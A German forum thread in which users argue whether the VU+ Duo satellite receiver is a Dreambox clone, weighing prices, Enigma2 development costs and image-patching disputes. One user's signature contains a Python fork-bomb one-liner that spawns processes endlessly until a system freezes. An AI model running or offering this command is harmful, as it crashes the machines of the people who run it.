Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

  • Original von Dr.Best
    Wartet mal, soviel Fairness muss sein: die vu+ ist kein clone.

    Alleine für einen VHS-Videorecorder habe ich schon damals 1.800 DEM ausgegeben.


    Ja, ich auch, allerdings nur 1700DM... =) Aber es musste damals ja unbedingt ein HIFI-Video her... =)


    genauso ist es ... 8)
  • Original von Dr.Best
    Wartet mal, soviel Fairness muss sein: die vu+ ist kein clone.

    Alleine für einen VHS-Videorecorder habe ich schon damals 1.800 DEM ausgegeben.


    Ja, ich auch, allerdings nur 1700DM... =) Aber es musste damals ja unbedingt ein HIFI-Video her... =)


    OT on: wars ein BetaMax2000 VCR? Da fühle ich mich garnicht mehr so alt hier... :D
    OToff
  • Original von dam72
    OT on: wars ein BetaMax2000 VCR? Da fühle ich mich garnicht mehr so alt hier... :D
    OToff


    Nein, sooo alt bin ich dann wieder doch nicht... =) :D =) Zu BetaMax Zeiten habe ich noch als Jugendlicher monatelang Werbung ausgetragen, damit ich mir überhaupt einen Walkman leisten kann... :)
    4 8 15 16 23 42
  • Original von Dr.Best

    Aber DMM bezahlt Programmierer, welche Enigma2 von Null auf entwickelten und immer noch vorantreiben. Das ist schon ein großer Unterschied.

    Bei VU+ ist dem nicht so, die haben auf eine vorgefertigte Software zurückgegriffen und primeln sich diese zusammen.



    Genau das ist der springende Punkt, ich möchte gerne mal wissen wie sich die "Entwickler" von VU+ fühlen bzw. reagieren würden, wenn man einfach deren sachen (wenn sie mal was selber machen würden) einfach für andere Dinge "missbraucht" und die anderen dann die Lorberen dafür einheimsen, aber wenn etwas nicht laufen würde VU+ dann die "tritte" bekommt.

    Finde es echt schade, das es soweit gekommen ist, das man es sich einfach nimmt anstatt zumindest mal zu fragen ob man es auch benutzen darf, aber ich gehe davon aus das die VU+ schneller wieder vom Markt verschwunden ist, wie sie auch aufgetaucht ist. Ich würde mich auf jedenfall darüber freuen!

    Denn wo wären wir heute ohne DMM, die die Entwicklung in diesem Bereich eingeleitet haben und auch vorantreiben!

    Also in diesem Sinne lieber etwas mehr Geld für eine 8000 investieren, dafür auch eine Leistung erhalten, als eine zusammengeklaute VU+.
  • Original von Dr.Best

    Also in diesem Sinne lieber etwas mehr Geld für eine 8000 investieren, dafür auch eine Leistung erhalten, als eine zusammengeklaute VU+.



    na na bitte nicht so untertreiben. 999.- zu 450.- nennst du ein bißchen mehr? 8o

    Dream sollte mal eine Alternative dazu bringen!
    Ich würde dafür gern 100 euro mehr löhnen das es von Dream kommt. :rolleyes:

    Gruß CoolDog

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von CoolDog ()

  • die 8000er gibts im moment fuer 850 euronen...

    ..dann berechne mal die entwicklungszeit + kosten fuer e2..so ein programmierer will bestimmt mehr wie 1000 euro im monat :)

    ..wenn man das alles hochrechnet ist es schon ok..
  • Ich will ja nicht behaupten das die 8k nicht ihr Geld wert ist, aber leider sind mir hier Grenzen gesetzt.

    Wenn meine Frau wüßte was mich damals die 7025+ gekostet hat, würde ich wahrscheinlich heute noch auf der Couch schlafen müßen. :D

    Ich will auch ne HD Twin für 530 .- von DMM aber das sieht ja momentan nicht so aus als würde demnächst was zu erwarten sein. :rolleyes:


    Gruß CoolDog
  • Original von Dr.Best
    Ich habe auf jeden Fall gerne ein Produkt, bei dem ich weiß, dass dieses in Deutschland entwickelt wird (um mal ein bisschen Patriotismus aufkommen zu lassen :D )


    Ich hab auch gern Geräte die in Deutschland gefertigt werden. DMM entwickelt ja in Deutschland, gefertigt (und geclont) werden se aber in China... leider :)

    AVM schaffts auch in BRD zu fertigen, ich hab noch keinen Fritzbox-1:1-Clone gesehen...

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von !NC ()

  • Dann stellen sich mir 2 fragen:

    1.Was ist der unterschied zwischen einem Clone und ner billigen kopie?

    2.Warum musste es die selbe hardware wie bei dmm sein wo es doch soviel alternativen gibt siehe z.b coolstream hardware oder ST wie es Kathrein benutzt(VU soll ja mit denen zusammenhängen irgendwie) wird?
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Ist doch ganz ein ganz typischer Trend:

    "Ich bin doch nicht Bloed ... " "Alles muss billger .... "

    Am liebsten fuer den Preis eins Tata Nano: Das billigste Auto der Welt

    Aber bitte mit der Austattung eines Mercedes Benz S-Klasse .... "

    Aber es ist das immer das ganze Paket was zaehlt ...

    Und das ist numal DMM mir E2 und nicht xyz mit E2

    Und ihr alle wisst doch das es nicht die Hardware ist die Geld kostet .....

    Sondern die Entwicklung !!!
    Why drink & Drive ?

    When you can smoke & fly 8)
  • Original von CoolDog

    na na bitte nicht so untertreiben. 999.- zu 450.- nennst du ein bißchen mehr? 8o

    Dream sollte mal eine Alternative dazu bringen!
    Ich würde dafür gern 100 euro mehr löhnen das es von Dream kommt. :rolleyes:

    Gruß CoolDog


    zwingt dich denn jemand eine Dream 8000 zu kaufen, kauf dir doch eine Humax die kosten noch viel weniger. Dream bringt nunmal aber keine Alternative, was auch nicht schlimm ist, denn Qualität Made in Germany hat seinen Preis.
    ______________________________________________________________________

    Man merkt an den ganzen Kommentaren das die Leute zu geizig sind für Qualität zu zahlen und dann noch meckern wenn was auf den BILLIG Boxen nicht läuft. Ich kann mir die 8000 auch nicht sofort kaufen, dann muss man halt darauf sparen, das mache ich aber anstatt als die Chinesen zu unterstützen und mich über die miese Qualität bzw. Support und die geklaute Source zu ärgern.
  • Original von pommesfrites
    Original von CoolDog

    na na bitte nicht so untertreiben. 999.- zu 450.- nennst du ein bißchen mehr? 8o

    Dream sollte mal eine Alternative dazu bringen!
    Ich würde dafür gern 100 euro mehr löhnen das es von Dream kommt. :rolleyes:

    Gruß CoolDog


    zwingt dich denn jemand eine Dream 8000 zu kaufen, kauf dir doch eine Humax die kosten noch viel weniger. Dream bringt nunmal aber keine Alternative, was auch nicht schlimm ist, denn Qualität Made in Germany hat seinen Preis.
    ______________________________________________________________________

    Man merkt an den ganzen Kommentaren das die Leute zu geizig sind für Qualität zu zahlen und dann noch meckern wenn was auf den BILLIG Boxen nicht läuft. Ich kann mir die 8000 auch nicht sofort kaufen, dann muss man halt darauf sparen, das mache ich aber anstatt als die Chinesen zu unterstützen und mich über die miese Qualität bzw. Support und die geklaute Source zu ärgern.


    Komisch, bei all meinen Dreamboxen hatte ich bisher mindestens einen Defekt (wurde aber problemlos über Garantie abgewickelt). Dabei denke ich im Moment auch an die mangelhaften "Billig-Fernbedienungen" der aktuellen DM800-Serie.

    Wenn das als Qualität angesehen wird, weiß ich nicht was ich dazu noch schreiben soll.

    Lehn Dich deshalb nicht zu weit aus dem Fenster.
    Das Entwicklungskosten sich auch spürbar auf die Preise auswirkt, ist mir klar und kann ich auch nachvollziehen (siehe Pharmaindustrie).

    Ne Dream ist nun mal der Mercedes unter den Receivern und dafür bin ich gerne bereit, ein paar Euros mehr auszugeben.
  • Original von pommesfrites
    zwingt dich denn jemand eine Dream 8000 zu kaufen, kauf dir doch eine Humax die kosten noch viel weniger. Dream bringt nunmal aber keine Alternative, was auch nicht schlimm ist, denn Qualität Made in Germany hat seinen Preis.



    mmmh, was hat den humax jetzt damit zu tuen ?( und ist/sitz humax nicht auch in Deutschland ?(

    ich frag nur mal so wegen dein Qualität Made in Germany

    Quellcode

    1. http://www.humax-digital.de/abouthumax/map.asp
    "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
    (Marie von Ebner-Eschenbach)

    Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von chriskula ()

  • Und Ihr seit sicher das die Entwickler bei DMM angestellt sind und es da nicht(auch) eine kleine Firma (mit sehr wenigen Kunden) gibt die das auf Rechnungsbasis steuerschonend erledigt ?

    Und Marusys hat ja ein R&D Center in Deutschland eröffent.

    Und Ihr wisst schon das man mit BA auch VU+ images auf den Dreamboxen booten kann ?

    Und ich bin eigentlich sehr loyal zu DMM und habe auch eine klare Meinung zu Kloneboxen.

    Und ich habe auch schon mehrfach geschrieben das Leute die enigma2 auf die ganzen OEM boxen von Marusys portiert haben Ihnen vorsätzlich das Geschäftsmodell boykotiert haben, und es daher eigentlich nicht so schwer sein sollte sich zu denken warum Sie jetzt eine enigma2 box rausbringen.

    PS: Ich hätte STLinux auf die Dreambox portiert, aber ich bin auch kein Koreaner :)

    LG
    gutemine

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

  • Original von gutemine
    Und Ihr wisst schon das man mit BA auch VU+ images auf den Dreamboxen booten kann ?


    dazu hat drbest schon das richtige drueben gesagt..


    Und ich habe auch schon mehrfach geschrieben das Leute die enigma2 auf die ganzen OEM boxen von Marusys portiert haben Ihnen vorsätzlich das Geschäftsmodell boykotiert haben, und es daher eigentlich nicht so schwer sein sollte sich zu denken warum Sie jetzt eine enigma2 box rausbringen.


    weil sie denken wie die clonehersteller ? hey es gibt doch e2, welches weiterentwickelt wird, warum sollten wir uns die arbeit machen..wenn dmm die bezahlt und nun sagt, komm wir machen kein offenes system mehr, was passiert dann mit der weiterentwicklung ???

    und die von hd+ denken auch dass humax viele receiver verkauft haben, weil sie so viele karten verkauft werden :D

    also immer schoen locker bleiben..wenn die leute anfangen zu meckern und sehen was vlt. ein aufwand es ist, ueberlegen die sich das alles zwei mal..
  • Dann hast du nicht verstanden was da abläuft, und was Dr.Best geschrieben hat habe ich gelesen.

    Ich erzähle Euch jetzt mal eine Gute Nacht Geschichte:

    Irgend jemand hat vor gar nicht so langer Zeit in einem gar nicht so weit entferntem Land mal geschrieben was er von den Klonen hält und das er seltsam finde wenn die Imagebauer nicht mal die simpelsten Checks implementieren um das patchen ihrer Images für diese Boxen zu verhindern.... und es ist damals nichts passiert.

    Wenn jetzt Dreambox images auf dem VU+ mit BA laufen - und man braucht keine 20 min um ein ganzes image zu klauen das du es sogar drauf flashen kannst... was irgendjemand auch dezent nachgewiesen hat indem er das VU+ Originalimage so umgehämmert hat das man es auf der 8000er flashen kann.

    Jetzt wird seltsamerweise auf einmal ernsthaft (!) drüber diskutiert, man liest auf einmal Lizenz Files, macht diese in seine Plugins oder entdeckt das diese schon ewig drinnen sind.

    Und plötzlich sagen ImageTeams (wie auch das Newnigma2) klar sie machen kein Image für die VU+ und müssten dann logischerweise auch konsequent gegen das Patchen Ihrer images für Klone vorgehen...

    Schon seltsam was ein 'Abtrünniger' bewirken kann ...

    Aber das ist ja nur eine Gute Nacht Geschichte.

    LG
    gutemine

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Lost in Space ()

  • Original von gutemine
    Und Ihr seit sicher das die Entwickler bei DMM angestellt sind und es da nicht(auch) eine kleine Firma (mit sehr wenigen Kunden) gibt die das auf Rechnungsbasis steuerschonend erledigt ?


    So what, selbst wenns so waere? Bezahlt wird es aber von DMM! Betonung liegt auf "bezahlt". ;)


    Und Marusys hat ja ein R&D Center in Deutschland eröffent.


    Ja nee, is klar. ;) man muss ja n Alibi haben. Mal abwarten was da Researched und Developed wird. :D.


    Und Ihr wisst schon das man mit BA auch VU+ images auf den Dreamboxen booten kann ?


    Mal im Ernst, wieso sollte ich das wollen? Wieso in aller Welt sollte ich mir ein VU+ Image auf meine Dreambox installieren?


    Und ich bin eigentlich sehr loyal zu DMM und habe auch eine klare Meinung zu Kloneboxen.


    So sollten wir doch wohl alle denken, denn wenn die Clones den Markt kaputt gemacht haben, denke ich, gibt es auch keine neuen Boxen mehr und keine reelle Weiterentwicklung im E2. IMHO
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • keine ahnung wer den thread geschlossen hatte nun ist er wieder offen :P :P

    Original von gutemine

    Und plötzlich sagen ImageTeams (wie auch das Newnigma2) klar sie machen kein Image für die VU+ und müssten dann logischerweise auch konsequent gegen das Patchen Ihrer images für Klone vorgehen...

    Schon seltsam was ein 'Abtrünniger' bewirken kann ...



    bei den clones war das noch so wirklich ein thema da wurde schon viel im bootloader durch die software-firma von dmm gemacht :D
    auch hätten wir bei VU+ nix grossartiges unternommen da zum booten unseres images ja bootloader und kernel etc. passen müssen was ja nun
    nicht mehr der fall ist , da das genuinedreambox-plugin von uns ist werden wir jetzt dochmal ernsthaft drüber nachdenken ob wir nicht eine
    dreamboxabfrage in unsere plugins einbauen.
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Ich mach ja niemadem eine Vorwurf, und wie du richtig sagst Ihr habt mit dem Genuine Plugin ja auch zu der Diskussion was beigetragen.

    Loader und Treiber sind halt auch zu leicht zu tauschen/täuschen - auch BA hat leider vieleicht dazu beigetragen diese Dinge zu umgehen.

    Manchmal muss man Diskussionen und Entscheidungen halt auch ein bischen provizieren, und ich gehe dafür vieleicht auch mal ungewöhnliche Wege die nicht jedem gefallen ...aber das halte ich (gerne) aus.

    PS: Ich habe aber eh auch schon an anderen Stellen kundgetan das die VU+ derzeit versucht auch die flugunfähigen Vögel zu täuschen indem sie in der /proc/cpuinfo eine 8000er vorspiegelt mit einer cPU die gar nicht drinnen ist - da sollte DMM mal Ihr copyright reinmachen um das zu beenden.

    Und das im /proc endlich eindeutig die secondstage loader version über die Treiber für jeden inklusive (C) DMM auslesbar ist wäre auch ein Fortschritt der es den programmierern leichter machen würde.

    Und wenn VU+ dann endlich offiziell eine CAM fü das auf den Kartenlesern offiziell versprochene Conax ausliefern würde hätten auch andere was davon.

    Ich habe halt auch kleine Wünsche ...

    LG
    gutemine

    Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von Lost in Space ()